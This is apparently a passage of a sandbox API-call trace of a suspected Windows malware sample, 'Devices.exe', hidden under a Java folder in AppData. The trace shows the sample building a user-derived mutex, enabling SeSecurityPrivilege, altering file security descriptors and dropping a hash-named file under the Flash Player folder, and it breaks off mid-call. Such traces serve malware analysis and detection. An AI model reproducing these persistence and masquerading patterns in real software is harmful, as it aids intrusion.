CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0", cchWideChar=483, lpMultiByteStr=0x126fad0, cbMultiByte=484, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0000, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00BD0000\r\ncoreData.initFlags=0x0", lpUsedDefaultChar=0x0) returned 483 [0058.603] GetSystemTime (in: lpSystemTime=0xdcf608 | out: lpSystemTime=0xdcf608*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x15, wMilliseconds=0x1b)) [0058.603] SystemTimeToFileTime (in: lpSystemTime=0xdcf608, lpFileTime=0xdcf5f8 | out: lpFileTime=0xdcf5f8) returned 1 [0058.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Devices.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0058.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Devices.exe", cchWideChar=11, lpMultiByteStr=0x126fa60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Devices.exe", lpUsedDefaultChar=0x0) returned 11 [0058.604] GetModuleHandleA (lpModuleName="secur32.dll") returned 0x0 [0058.608] LoadLibraryA (lpLibFileName="secur32.dll") returned 0x74350000 [0058.612] LoadLibraryA (lpLibFileName="SSPICLI") returned 0x744e0000 [0058.613] GetProcAddress (hModule=0x744e0000, lpProcName="GetUserNameExW") returned 0x744ec5f0 [0058.613] GetUserNameExW () returned 0x1 [0058.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0058.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x126ffa0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0058.617] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="8A") returned 2 [0058.617] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="00") returned 2 [0058.617] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="00") returned 2 [0058.617] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="00") returned 2 [0058.617] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="B7") returned 2 [0058.618] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="49") returned 2 [0058.618] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="67") returned 2 [0058.618] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="98") returned 2 [0058.618] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="F6") returned 2 [0058.618] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="14") returned 2 [0058.619] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="59") returned 2 [0058.619] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="35") returned 2 [0058.619] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="AA") returned 2 [0058.619] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="3E") returned 2 [0058.619] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="27") returned 2 [0058.619] wvnsprintfW (in: pszDest=0xdcf3f0, cchDest=6, pszFmt="%02X", arglist=0xdcf3cc | out: pszDest="60") returned 2 [0058.619] CreateMutexW (lpMutexAttributes=0xbee89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1e0 [0058.619] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0xffffffff) returned 0x0 [0058.619] PathRemoveFileSpecW (in: pszPath="" | out: pszPath="") returned 0 [0058.620] PathSkipRootW (pszPath="") returned 0x0 [0058.620] GetFileAttributesW (lpFileName="") returned 0xffffffff [0058.620] CreateDirectoryW (lpPathName="", lpSecurityAttributes=0x0) returned 0 [0058.620] GetCurrentThread () returned 0xfffffffe [0058.620] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0xdcf654 | out: TokenHandle=0xdcf654*=0x0) returned 0 [0058.620] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdcf654 | out: TokenHandle=0xdcf654*=0x1ec) returned 1 [0058.621] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0xdcf65c | out: lpLuid=0xdcf65c*(LowPart=0x8, HighPart=0)) returned 1 [0058.669] AdjustTokenPrivileges (in: TokenHandle=0x1ec, DisableAllPrivileges=0, NewState=0xdcf658*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0058.669] GetLastError () returned 0x0 [0058.669] CloseHandle (hObject=0x1ec) returned 1 [0058.670] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.670] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x106c640, lpbSaclPresent=0xdcf68c, pSacl=0xdcf680, lpbSaclDefaulted=0xdcf688 | out: lpbSaclPresent=0xdcf68c, pSacl=0xdcf680, lpbSaclDefaulted=0xdcf688) returned 1 [0058.670] SetNamedSecurityInfoW () returned 0x7b [0058.676] LocalFree (hMem=0x106c640) returned 0x0 [0058.676] GetFileAttributesW (lpFileName="") returned 0xffffffff [0058.680] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0058.685] wvnsprintfA (in: pszDest=0x126fba0, cchDest=21, pszFmt="%d", arglist=0xdcf5f0 | out: pszDest="1476366141") returned 10 [0058.686] CreateFileW (lpFileName="", dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.687] ReleaseMutex (hMutex=0x1e0) returned 1 [0058.687] CloseHandle (hObject=0x1e0) returned 1 [0058.689] SetLastError (dwErrCode=0x0) [0058.689] LocalFree (hMem=0x1065860) returned 0x0 [0058.689] SetErrorMode (uMode=0x8007) returned 0x0 [0058.689] GetCommandLineW () returned="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"" [0058.689] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"", pNumArgs=0xdcfef8 | out: pNumArgs=0xdcfef8) returned 0x1069ba0*="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" [0058.690] LocalFree (hMem=0x1069ba0) returned 0x0 [0058.690] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe", NtPathName=0xdcfb3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0058.690] NtCreateFile (in: FileHandle=0xdcfb30, DesiredAccess=0x8, ObjectAttributes=0xdcfb44*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdcfb34, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdcfb30*=0x1e0, IoStatusBlock=0xdcfb34*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0058.691] NtQueryEaFile (in: FileHandle=0x1e0, IoStatusBlock=0xdcfb34, Buffer=0x126f668, Length=0x405, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0xdcfb34, Buffer=0x126f668) returned 0x0 [0058.692] NtClose (Handle=0x1e0) returned 0x0 [0058.693] GetLastError () returned 0x0 [0058.693] GetLocalTime (in: lpSystemTime=0xdcf6f0 | out: lpSystemTime=0xdcf6f0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x15, wMilliseconds=0x69)) [0058.693] GetCurrentThreadId () returned 0xbcc [0058.693] GetCurrentProcessId () returned 0x84 [0058.693] wvnsprintfW (in: pszDest=0x11f04a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0xdcf694 | out: pszDest="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: ") returned 86 [0058.693] wvnsprintfW (in: pszDest=0x11f054c, cchDest=1962, pszFmt="Current OS guid {%08X-%04X-%04X-%08X%08X}.", arglist=0xdcf714 | out: pszDest="Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.") returned 54 [0058.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 140 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x126f6d0, cbMultiByte=141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", lpUsedDefaultChar=0x0) returned 140 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 140 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x126f820, cbMultiByte=141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0001, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", lpUsedDefaultChar=0x0) returned 140 [0058.694] GetSystemTime (in: lpSystemTime=0xdcf2e0 | out: lpSystemTime=0xdcf2e0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x15, wMilliseconds=0x69)) [0058.694] SystemTimeToFileTime (in: lpSystemTime=0xdcf2e0, lpFileTime=0xdcf2d0 | out: lpFileTime=0xdcf2d0) returned 1 [0058.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Devices.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0058.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Devices.exe", cchWideChar=11, lpMultiByteStr=0x126f7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Devices.exe", lpUsedDefaultChar=0x0) returned 11 [0058.695] GetUserNameExW () returned 0x1 [0058.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0058.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x126f9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0058.696] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="8A") returned 2 [0058.696] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="00") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="00") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="00") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="B7") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="49") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="67") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="98") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="F6") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="14") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="59") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="35") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="AA") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="3E") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="27") returned 2 [0058.697] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="60") returned 2 [0058.697] CreateMutexW (lpMutexAttributes=0xbee89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1e0 [0058.697] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0xffffffff) returned 0x0 [0058.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdcf17c, cbMultiByte=92, lpWideCharStr=0xdcef40, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoeÜ豞皰") returned 92 [0058.698] PathCombineW (in: pszDest=0xbf12e8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" [0058.698] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0058.698] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0058.698] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0058.698] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0058.698] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0058.699] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0058.699] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0058.699] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0058.699] GetCurrentThread () returned 0xfffffffe [0058.699] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x0) returned 0 [0058.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x210) returned 1 [0058.699] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0xdcf334 | out: lpLuid=0xdcf334*(LowPart=0x8, HighPart=0)) returned 1 [0058.700] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0xdcf330*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0058.700] GetLastError () returned 0x0 [0058.700] CloseHandle (hObject=0x210) returned 1 [0058.701] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.701] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x106c368, lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360 | out: lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360) returned 1 [0058.701] SetNamedSecurityInfoW () returned 0x0 [0058.741] LocalFree (hMem=0x106c368) returned 0x0 [0058.741] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0058.741] GetCurrentThread () returned 0xfffffffe [0058.741] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x0) returned 0 [0058.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x210) returned 1 [0058.742] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0xdcf334 | out: lpLuid=0xdcf334*(LowPart=0x8, HighPart=0)) returned 1 [0058.743] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0xdcf330*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0058.743] GetLastError () returned 0x0 [0058.743] CloseHandle (hObject=0x210) returned 1 [0058.743] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.743] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x106c640, lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360 | out: lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360) returned 1 [0058.743] SetNamedSecurityInfoW () returned 0x0 [0058.745] LocalFree (hMem=0x106c640) returned 0x0 [0058.745] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0058.746] GetFileSizeEx (in: hFile=0x210, lpFileSize=0xdcf378 | out: lpFileSize=0xdcf378*=0) returned 1 [0058.746] CloseHandle (hObject=0x210) returned 1 [0058.746] wvnsprintfA (in: pszDest=0x126fb70, cchDest=21, pszFmt="%d", arglist=0xdcf2c8 | out: pszDest="1476366141") returned 10 [0058.747] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0058.748] WriteFile (in: hFile=0x210, lpBuffer=0x126fa30*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0xdcf37c, lpOverlapped=0x0 | out: lpBuffer=0x126fa30*, lpNumberOfBytesWritten=0xdcf37c, lpOverlapped=0x0) returned 1 [0058.749] CloseHandle (hObject=0x210) returned 1 [0058.751] ReleaseMutex (hMutex=0x1e0) returned 1 [0058.751] CloseHandle (hObject=0x1e0) returned 1 [0058.751] SetLastError (dwErrCode=0x0) [0058.751] GetLastError () returned 0x0 [0058.751] GetLocalTime (in: lpSystemTime=0xdcf6f0 | out: lpSystemTime=0xdcf6f0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x15, wMilliseconds=0xa7)) [0058.751] GetCurrentThreadId () returned 0xbcc [0058.751] GetCurrentProcessId () returned 0x84 [0058.751] wvnsprintfW (in: pszDest=0x11f04a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0xdcf694 | out: pszDest="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: ") returned 86 [0058.751] wvnsprintfW (in: pszDest=0x11f054c, cchDest=1962, pszFmt="Current OS guid {%08X-%04X-%04X-%08X%08X}.", arglist=0xdcf714 | out: pszDest="Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.") returned 54 [0058.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 140 [0058.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x126f6d0, cbMultiByte=141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", lpUsedDefaultChar=0x0) returned 140 [0058.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 140 [0058.752] WideCharToMultiByte (in: 